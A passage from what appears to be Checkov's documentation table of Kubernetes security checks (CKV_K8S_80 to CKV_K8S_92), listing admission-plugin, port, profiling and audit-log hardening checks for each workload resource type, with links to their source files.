[ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 2998 | CKV_K8S_80 | resource | PodTemplate | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 2999 | CKV_K8S_80 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3000 | CKV_K8S_80 | resource | ReplicationController | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3001 | CKV_K8S_80 | resource | StatefulSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3002 | CKV_K8S_81 | resource | CronJob | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3003 | CKV_K8S_81 | resource | DaemonSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | 
[ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3004 | CKV_K8S_81 | resource | Deployment | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3005 | CKV_K8S_81 | resource | DeploymentConfig | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3006 | CKV_K8S_81 | resource | Job | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3007 | CKV_K8S_81 | resource | Pod | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3008 | CKV_K8S_81 | resource | PodTemplate | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3009 | CKV_K8S_81 | resource | ReplicaSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | 
[ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3010 | CKV_K8S_81 | resource | ReplicationController | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3011 | CKV_K8S_81 | resource | StatefulSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3012 | CKV_K8S_82 | resource | CronJob | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3013 | CKV_K8S_82 | resource | DaemonSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3014 | CKV_K8S_82 | resource | Deployment | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3015 | CKV_K8S_82 | resource | DeploymentConfig | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3016 | 
CKV_K8S_82 | resource | Job | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3017 | CKV_K8S_82 | resource | Pod | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3018 | CKV_K8S_82 | resource | PodTemplate | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3019 | CKV_K8S_82 | resource | ReplicaSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3020 | CKV_K8S_82 | resource | ReplicationController | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3021 | CKV_K8S_82 | resource | StatefulSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3022 | CKV_K8S_83 | resource | CronJob | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 
3023 | CKV_K8S_83 | resource | DaemonSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3024 | CKV_K8S_83 | resource | Deployment | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3025 | CKV_K8S_83 | resource | DeploymentConfig | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3026 | CKV_K8S_83 | resource | Job | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3027 | CKV_K8S_83 | resource | Pod | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3028 | CKV_K8S_83 | resource | PodTemplate | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3029 | CKV_K8S_83 | resource | ReplicaSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | 
[ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3030 | CKV_K8S_83 | resource | ReplicationController | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3031 | CKV_K8S_83 | resource | StatefulSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3032 | CKV_K8S_84 | resource | CronJob | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3033 | CKV_K8S_84 | resource | DaemonSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3034 | CKV_K8S_84 | resource | Deployment | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3035 | CKV_K8S_84 | resource | DeploymentConfig | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3036 | CKV_K8S_84 | resource | Job | Ensure 
that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3037 | CKV_K8S_84 | resource | Pod | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3038 | CKV_K8S_84 | resource | PodTemplate | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3039 | CKV_K8S_84 | resource | ReplicaSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3040 | CKV_K8S_84 | resource | ReplicationController | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3041 | CKV_K8S_84 | resource | StatefulSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3042 | CKV_K8S_85 | resource | CronJob | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) 
| -| 3043 | CKV_K8S_85 | resource | DaemonSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3044 | CKV_K8S_85 | resource | Deployment | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3045 | CKV_K8S_85 | resource | DeploymentConfig | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3046 | CKV_K8S_85 | resource | Job | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3047 | CKV_K8S_85 | resource | Pod | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3048 | CKV_K8S_85 | resource | PodTemplate | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3049 | CKV_K8S_85 | resource | ReplicaSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | 
[ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3050 | CKV_K8S_85 | resource | ReplicationController | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3051 | CKV_K8S_85 | resource | StatefulSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | -| 3052 | CKV_K8S_86 | resource | CronJob | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3053 | CKV_K8S_86 | resource | DaemonSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3054 | CKV_K8S_86 | resource | Deployment | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3055 | CKV_K8S_86 | resource | DeploymentConfig | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3056 | CKV_K8S_86 | resource | Job | Ensure that the --insecure-bind-address argument is not set | Kubernetes | 
[ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3057 | CKV_K8S_86 | resource | Pod | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3058 | CKV_K8S_86 | resource | PodTemplate | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3059 | CKV_K8S_86 | resource | ReplicaSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3060 | CKV_K8S_86 | resource | ReplicationController | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3061 | CKV_K8S_86 | resource | StatefulSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | -| 3062 | CKV_K8S_88 | resource | CronJob | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3063 | CKV_K8S_88 | resource | DaemonSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | 
[ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3064 | CKV_K8S_88 | resource | Deployment | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3065 | CKV_K8S_88 | resource | DeploymentConfig | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3066 | CKV_K8S_88 | resource | Job | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3067 | CKV_K8S_88 | resource | Pod | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3068 | CKV_K8S_88 | resource | PodTemplate | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3069 | CKV_K8S_88 | resource | ReplicaSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3070 | CKV_K8S_88 | resource | ReplicationController | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3071 | CKV_K8S_88 | resource | 
StatefulSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | -| 3072 | CKV_K8S_89 | resource | CronJob | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3073 | CKV_K8S_89 | resource | DaemonSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3074 | CKV_K8S_89 | resource | Deployment | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3075 | CKV_K8S_89 | resource | DeploymentConfig | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3076 | CKV_K8S_89 | resource | Job | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3077 | CKV_K8S_89 | resource | Pod | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3078 | CKV_K8S_89 | resource | PodTemplate | Ensure that the --secure-port argument is not set to 0 | Kubernetes | 
[ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3079 | CKV_K8S_89 | resource | ReplicaSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3080 | CKV_K8S_89 | resource | ReplicationController | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3081 | CKV_K8S_89 | resource | StatefulSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | -| 3082 | CKV_K8S_90 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3083 | CKV_K8S_90 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3084 | CKV_K8S_90 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3085 | CKV_K8S_90 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3086 | CKV_K8S_90 | resource | Job | Ensure that the 
--profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3087 | CKV_K8S_90 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3088 | CKV_K8S_90 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3089 | CKV_K8S_90 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3090 | CKV_K8S_90 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3091 | CKV_K8S_90 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | -| 3092 | CKV_K8S_91 | resource | CronJob | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3093 | CKV_K8S_91 | resource | DaemonSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3094 | CKV_K8S_91 | resource | Deployment | 
Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3095 | CKV_K8S_91 | resource | DeploymentConfig | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3096 | CKV_K8S_91 | resource | Job | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3097 | CKV_K8S_91 | resource | Pod | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3098 | CKV_K8S_91 | resource | PodTemplate | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3099 | CKV_K8S_91 | resource | ReplicaSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3100 | CKV_K8S_91 | resource | ReplicationController | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3101 | CKV_K8S_91 | resource | StatefulSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | -| 3102 | CKV_K8S_92 | resource | CronJob | Ensure that the 
--audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3103 | CKV_K8S_92 | resource | DaemonSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3104 | CKV_K8S_92 | resource | Deployment | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3105 | CKV_K8S_92 | resource | DeploymentConfig | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3106 | CKV_K8S_92 | resource | Job | Ensure that the --audit-log-maxage argument is set to 30 